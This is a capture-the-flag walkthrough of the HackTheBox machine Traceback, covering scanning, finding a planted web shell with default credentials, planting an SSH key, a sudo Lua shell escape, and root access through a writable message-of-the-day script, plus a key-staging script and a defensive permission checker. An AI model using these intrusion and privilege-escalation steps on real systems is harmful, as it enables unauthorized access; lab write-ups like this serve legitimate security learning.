This article is my guide for hacking Traceback, one of the retired machines at HackTheBox.eu. This is my first hacking guide, so hopefully I'm doing this correctly.
I enjoyed this box. It was right at my skill level and took me about two hours to complete.
To start, instead of using the target box's IP address, I created an /etc/hosts entry for it called traceback.htb. This change makes things a lot easier because I don't need to remember the IP address of the box. Note that the redirection has to run with root privileges too: with a plain "sudo echo ... >> /etc/hosts" only the echo is elevated and the shell's redirect fails with permission denied, so pipe the line through sudo tee instead.
echo "10.10.10.181 traceback.htb" | sudo tee -a /etc/hosts
nmap -A traceback.htb

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 14:43 CDT
Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.061s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds
Pretty simple scan: only two ports are open, SSH on 22 and an Apache web server on 80.
Web site looks like this:
Viewing the page source reveals this:
I searched Google for that string:
It looks like we got a hit. I'm going to see if any of those web shells are sitting on this server, so it's time for gobuster.
I took the list of shell file names from that GitHub repository and dumped them into a text file called shells.txt to use as the wordlist. Let's see if we can find any of them on the server.
Now let's fire up gobuster with that wordlist:
We got a hit!
I loaded the page into the browser:
And this came up:
Looking at the source code of the original shell on GitHub, I can see a default login hard-coded in it.
Username: admin Password: admin
Let's try those.
...we are in. The web shell runs as the user webadmin. After browsing around in the webadmin home folder, I noticed that /home/webadmin/.ssh is writable. We can upload an authorized_keys file containing our public key and gain access via SSH, which is much more comfortable than working through a web shell.
First, let's generate an SSH key pair; I named the key file traceback:
Now let's copy the public key to authorized_keys:
cp traceback.pub authorized_keys
Now let's upload it via the form on the website:
Great, it took it. Now let's restrict the permissions on the private key, since the ssh client refuses to use a key file that is readable by other users.
chmod 600 traceback
Now let's ssh into the box:
ssh -i traceback webadmin@traceback.htb
We are in!
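The key-staging steps above, collected into one script as an added example (this is not code from the original write-up). It assumes an ed25519 key and a target home directory passed in as a parameter; the part that matters on the target is the file modes: sshd runs with StrictModes on by default and silently ignores an authorized_keys file whose home directory, .ssh directory or the file itself is group- or world-writable, which is the usual reason an uploaded key "does not work".

```shell
#!/bin/sh
# Added example, not part of the original write-up. Generates a key pair,
# stages authorized_keys with the modes sshd's StrictModes expects, and
# checks those modes. Key type (ed25519) and all paths are assumptions.

# Generate a passphrase-less ed25519 key pair at path $1 (and $1.pub).
gen_key() {
    ssh-keygen -t ed25519 -N "" -C "traceback" -f "$1" >/dev/null
}

# Append public key line $2 to $1/.ssh/authorized_keys with safe modes:
# 700 on .ssh and 600 on authorized_keys.
install_pubkey() {
    sshdir="$1/.ssh"
    mkdir -p "$sshdir"
    chmod 700 "$sshdir"
    printf '%s\n' "$2" >> "$sshdir/authorized_keys"
    chmod 600 "$sshdir/authorized_keys"
}

# Octal mode of a path (GNU stat first, BSD stat as fallback).
file_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Print $1 only if it is group- or world-writable (-prune: do not descend).
loose() {
    find "$1" -prune \( -perm -g=w -o -perm -o=w \) -print
}

# Return 0 if home $1, $1/.ssh and authorized_keys all exist and none is
# group/world-writable, i.e. sshd with StrictModes will accept the key.
check_modes() {
    for p in "$1" "$1/.ssh" "$1/.ssh/authorized_keys"; do
        if [ ! -e "$p" ]; then
            echo "missing: $p"
            return 1
        fi
        if [ -n "$(loose "$p")" ]; then
            echo "too permissive for StrictModes: $p"
            return 1
        fi
    done
    return 0
}

# Stand-alone demo (run as: sh stage_key.sh demo); everything lands in a
# scratch directory standing in for /home/webadmin.
if [ "${1:-}" = "demo" ]; then
    home=$(mktemp -d)
    gen_key "$home/traceback"
    install_pubkey "$home" "$(cat "$home/traceback.pub")"
    chmod 600 "$home/traceback"
    check_modes "$home" && echo "ssh -i $home/traceback webadmin@traceback.htb"
fi
```

On the real box the upload form decides the mode of the file it writes, so after uploading it is worth running the equivalent of check_modes from the web shell before wondering why the key is rejected.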
Let's see if sudo lets us run anything as another user:
Oh, this looks promising. I googled luvit and found this:
Luvit is a Lua runtime (Lua on top of libuv), so the sudo rule effectively hands us a Lua interpreter as sysadmin. I went to GTFOBins to see how to get a shell out of a Lua interpreter.
And here is our strategy. First, I executed:
sudo -u sysadmin /home/sysadmin/luvit
The application dropped me into an interactive Lua prompt. I typed in the command I got from GTFOBins, but used bash instead of sh:
Now I've got a shell as sysadmin and the first flag!
Now let's see if we can get root.
I downloaded linpeas.sh from here.
I tried to fetch it directly on the box, but that didn't work.
So I'm going to download it to my local box and serve it with Python's built-in HTTP server (on Python 3 the same server lives in the http.server module). I'm running this in the same folder that linpeas.sh is in.
python -m SimpleHTTPServer
Now I can fetch it on the target by calling:
Let's make it executable:
chmod +x linpeas.sh
Now let's run linpeas.sh
Scrolling through the output, I noticed this:
00-header is one of the scripts in /etc/update-motd.d that build the message of the day shown when you log in, and linpeas flagged it as writable:
I decided to see if I could run "id" from that script when I log in as webadmin. Its output tells me which user the script actually runs as, and therefore what privileges anything I put in there gets.
echo "id" >> /etc/update-motd.d/00-header
When I log in again, the banner should now show which user executed that file. Hopefully root.
Boom, root! OK, let's exploit that. On HackTheBox the root flag is always /root/root.txt.
echo "cat /root/root.txt" >> /etc/update-motd.d/00-header
Now let's log in again.
And you can see the root flag printed:
We are all done! We could easily have used the same writable script to get an actual root shell, but all I needed for this box was the root flag. This box was fun! I highly recommend it.
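Turning the privilege escalation above into a repeatable check, as an added example (not code from the original write-up): the scripts in /etc/update-motd.d are run by pam_motd as root at every login, so any of them that a low-privileged user can modify is a root-level foothold, exactly what 00-header was here. The functions take the directory as a parameter so they can be exercised on a constructed copy; the constructed sample mirrors the two-script layout with 00-header deliberately world-writable, and the hardening step is the fix an administrator would apply.

```shell
#!/bin/sh
# Added example, not part of the original write-up. Enumerates and fixes
# update-motd.d scripts that a non-root user could edit. The directory
# argument and the sample layout are assumptions made for this example.

# Print every regular file under $1 that is group- or world-writable.
weak_motd_scripts() {
    find "$1" -type f \( -perm -g=w -o -perm -o=w \) -print | sort
}

# Print every regular file under $1 not owned by root. On a real system
# these are just as dangerous even when the mode bits look clean.
non_root_motd_scripts() {
    find "$1" -type f ! -user root -print | sort
}

# Strip group/world write bits from every script under $1. Restoring
# root ownership (chown root:root) is left to the operator.
harden_motd_dir() {
    find "$1" -type f -exec chmod go-w {} +
}

# Build a constructed copy of the layout linpeas flagged on the box:
# 00-header world-writable, 10-help-text with a sane mode.
make_sample_motd_dir() {
    mkdir -p "$1"
    printf '#!/bin/sh\necho "Welcome to Xh4H land"\n' > "$1/00-header"
    printf '#!/bin/sh\necho "help text"\n' > "$1/10-help-text"
    chmod 777 "$1/00-header"
    chmod 755 "$1/10-help-text"
}

# Stand-alone demo (run as: sh motd_check.sh demo) on a scratch copy;
# point weak_motd_scripts at /etc/update-motd.d on a live host instead.
if [ "${1:-}" = "demo" ]; then
    d=$(mktemp -d)/update-motd.d
    make_sample_motd_dir "$d"
    echo "before:"; weak_motd_scripts "$d"
    harden_motd_dir "$d"
    echo "after:";  weak_motd_scripts "$d"
fi
```

The probe the write-up used, appending "id" to the script and logging in again, remains the quickest way to confirm what the hardening check only infers: whatever is in that file runs as root before you even get a prompt.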